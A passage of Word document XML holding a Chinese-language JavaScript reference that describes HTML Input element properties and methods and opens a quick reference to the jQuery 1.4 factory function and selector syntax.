        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
      <w:r>
        <w:t>可能接受指定</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的多个值则本属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。它是</w:t>
      </w:r>
      <w:r>
        <w:t>multiple</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string pattern*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个正则表达式文本，输入的内容必须与它匹配，否则将被视为无效。这个属性使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>正则表达式语法（但没有开头和结尾的斜杠），不过要注意这个属性是一个字符串，而不是一个</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象。也要注意，为了有效起见，整个输入字符串都必须与正则表达式匹配，而不只是一个子串。（就像正则表达式以</w:t>
      </w:r>
      <w:r>
        <w:t>^</w:t>
      </w:r>
      <w:r>
        <w:t>开头并以</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>结尾一样。）这个属性是</w:t>
      </w:r>
      <w:r>
        <w:t>pattern</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string placeholder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:t>对用户的提示出现在</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素中的一小段文本字符串。当焦点处于该元素上时，占位文本将消失，同时输入光标将出现。这个属性是</w:t>
      </w:r>
      <w:r>
        <w:t>placeholder</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean readOnly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，当前</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素将不可编辑。它是</w:t>
      </w:r>
      <w:r>
        <w:t>readonly</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean required*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，如果用户没有在该</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素中输入内容，则容器表单将被视为无效。它是</w:t>
      </w:r>
      <w:r>
        <w:t>required</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Option selectedOption*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
      <w:r>
        <w:t>并且</w:t>
      </w:r>
      <w:r>
        <w:t>multiple</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，这个属性将返回列表中选中的</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素子节点，如果存在这样的子节点的话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long selectionEnd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回或设置选中文本之后的第一个输入字符的索引。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>setSelectionRange()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long selectionStart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回或设置＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞中第一个选中字符的索引。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>setSelectionRange()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned long size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于允许文本输入的</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素，本属性指定了元素的宽度占多少字符。它是</w:t>
      </w:r>
      <w:r>
        <w:t>size</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。注意与</w:t>
      </w:r>
      <w:r>
        <w:t>maxLength</w:t>
      </w:r>
      <w:r>
        <w:t>的不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string step*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于数字输入类型（包括日期及时间输入），这个属性指定了允许输入的值的粒度或步长大小。这个属性可以是字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"any"</w:t>
      </w:r>
      <w:r>
        <w:t>或者一个浮点数。它是</w:t>
      </w:r>
      <w:r>
        <w:t>step</w:t>
      </w:r>
      <w:r>
        <w:t>属性的映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date valueAsDate*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将对应元素的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>）作为一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>double valueAsNumber*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将对应元素的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>）作为一个数字返回。</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除了这儿列出的方法，</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素也实现了</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>所定义的所有方法。本列表中带有星号标记的方法是在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>新定义的，在写作本书的时候，还没有广泛实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void select()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法选中当前</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素中显示的所有文本。在大多数浏览器中，这意味着对应文本将高亮显示，同时用户新输入的文本将替换这段高亮显示的文本，而不是在它后面追加。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void setSelectionRange(unsigne</w:t>
      </w:r>
      <w:r>
        <w:t>d long start,unsigned long end)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法选中当前</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素中显示的文本，从位于</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>处的字符开始，直到（但不包含）位于</w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t>处的字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void stepDown([long n])*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于支持</w:t>
      </w:r>
      <w:r>
        <w:t>step</w:t>
      </w:r>
      <w:r>
        <w:t>属性的元素，将当前值减少</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个步长（</w:t>
      </w:r>
      <w:r>
        <w:t>step</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void stepUp([long n])*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于支持</w:t>
      </w:r>
      <w:r>
        <w:t>step</w:t>
      </w:r>
      <w:r>
        <w:t>属性的元素，将当前值增加</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个步长。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="844" w:name="jQuery"/>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="844"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery 1.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>库的一个快速参考。关于这个库的完整细节以及用例</w:t>
      </w:r>
      <w:r>
        <w:t>见第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章。本段参考的组织与格式与该部分的其余参考页有些不同。在方法签名中它使用了下面的转换。参数</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择器。参数</w:t>
      </w:r>
      <w:r>
        <w:t>idx</w:t>
      </w:r>
      <w:r>
        <w:t>是整数索引。参数</w:t>
      </w:r>
      <w:r>
        <w:t>elt</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>elts</w:t>
      </w:r>
      <w:r>
        <w:t>是文档元素或由文档元素组成的类数组对象。参数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>是回调函数，嵌套的圆括号用于声明</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>将传入提供的函数的参数。方括号声明可选参数。如果一个可选参数后面紧跟着一个等号和一个值，那个值将在参数省略时作为默认值。右圆括号和冒号之后是函数或方法的返回值。没有指定返回值的方法将返回调用它们的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>工厂函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:t>是若干应用函数的一个命名空间，同时它也是创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的工厂方法。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery()</w:t>
      </w:r>
      <w:r>
        <w:t>可以以下面展示的各种方式调用，它总是返回一个表示一个文档集合（或者文档对象本身）的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。符号</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的别名，在下面的各种方法中都可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery()</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery(sel[,context=document])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，该对象表示的文档元素为</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>的子孙节点，并且匹配选择字符串</w:t>
      </w:r>
      <w:r>
        <w:t>sel</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery(elts)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个表示指定元素的新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>elts</w:t>
      </w:r>
      <w:r>
        <w:t>可以是单个文档元素，也可以是一个由文档元素组成的数组或类数组对象（比如一个</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>或其他</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery(html,[props])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>作为一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>格式的字符串进行解析并返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，这个对象包含</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>字符串中定义的一个或多个顶级元素。如果</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>描述了一个单独的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签，则参数</w:t>
      </w:r>
      <w:r>
        <w:t>props</w:t>
      </w:r>
      <w:r>
        <w:t>可以为一个对象，其中可定义这个新建元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性或事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery(f)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注册函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，当</w:t>
      </w:r>
      <w:r>
        <w:t>doc</w:t>
      </w:r>
      <w:r>
        <w:t>ument</w:t>
      </w:r>
      <w:r>
        <w:t>加载完成并且就绪时调用。如果</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>已经就绪，</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>将作为</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一个方法立即调用。返回一个只包含</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择器语法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择器语法与</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>选择语法非常类似，</w:t>
      </w:r>
      <w:r>
        <w:t>19.8.1</w:t>
      </w:r>
      <w:r>
        <w:t>节有详细介绍。下面是摘要：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>简单的标签、类以及</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>选择器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251765760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2260120" cy="150962"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="110" name="00110.jpeg" descr="00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0.jpeg" descr="00110.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId113"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2260120" cy="150962"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>组合选择器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251766784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
